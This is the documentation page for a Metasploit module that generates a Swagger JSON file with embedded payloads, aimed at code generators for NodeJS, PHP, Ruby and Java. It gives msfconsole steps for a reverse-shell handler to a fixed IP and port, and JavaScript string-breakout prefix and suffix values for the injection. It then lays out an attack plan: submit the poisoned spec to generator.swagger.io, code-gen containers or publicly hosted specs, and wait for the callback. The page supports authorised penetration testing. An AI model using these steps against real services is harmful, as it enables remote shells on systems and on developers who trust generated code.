metasploit-gs/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md

The Swagger CodeGen parameter injector module generates a Swagger JSON file with embedded Metasploit payloads.

In the typical case, a Swagger document defines an API. Swagger can be automatically consumed to generate client/server code, testing and scaffolding in APIs by companies eager to provide value to the increasing need for scalable API deployment and testing.

Currently, this module supports 4 languages for delivery: NodeJS, PHP, Ruby, and Java. These are specified by the PAYLOAD set for the exploit module.

Verification Steps

All exploits assume a bind or reverse-tcp callback handler, with preference on reverse-tcp.

1. Start msfconsole
2. Start a callback handler listening for a the appropriate payload (e.g.)

use exploit/multi/handler  
set PAYLOAD nodejs/shell_reverse_tcp

set LHOST 192.168.68.138 
set LPORT 4444

run 

3. Pick a target

Targets

NodeJS

This attack looks to inject a payload into javascript by terminating a URL path string, and placing code inline without causing runtime errors.

nodejs-codegen

set PAYLOAD nodejs/shell_reverse_tcp
use exploit/multi/fileformat/swagger_param_inject

set INFO_VERSION "1.0.0"
set PAYLOAD_LOC "PATH"
set PAYLOAD_PREFIX "/a');};};return exports;}));"
set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
set SWAGGER_HOST "localhost"
run 

Quick Test

Use the online editor.swagger.io to upload your swagger document, and generate pre-built code bases from the document. The swagger editor leverages generator.swagger.io to build these clients & servers automatically from the document, and published downloadable artifacts of these code bases.

Scenarios

Effective against services with either these dependencies

• swagger-codegen
• public API generator.swagger.io
• public docker container swagger-generator/
• swagger-test-templates

Possible Attack approach.

1. Research the target environment and component dependencies.
2. Setup appropriate payload callback listener.
3. generate the appropriate swagger document with associated MS payload (see above for examples)

Against a webservice (2nd order attack / blind code-gen)

Who knows what insecurely configured code-gen Docker containers hosted in data compute or API broker cluster could do if given the chance...

4. Feed the document to the service in service appropriate submission of Swagger documents. This is most often accoplished by defining a Mock, Test or Pass-Thru service automatically constructed by the swagger document definition.
5. Wait for callback handler event.

Against a code repository or public hosting of spec

People and Robots trust swagger to build clients, servers, mocks, and more. Publicly hosted specs should be verified as to not corrupt automatic code generation.

4. Feed the document to the service in service appropriate submission of Swagger documents. This is most often accoplished by defining a Mock, Test or Pass-Thru service automatically constructed by the swagger document definition.
5. Wait for callback handler event.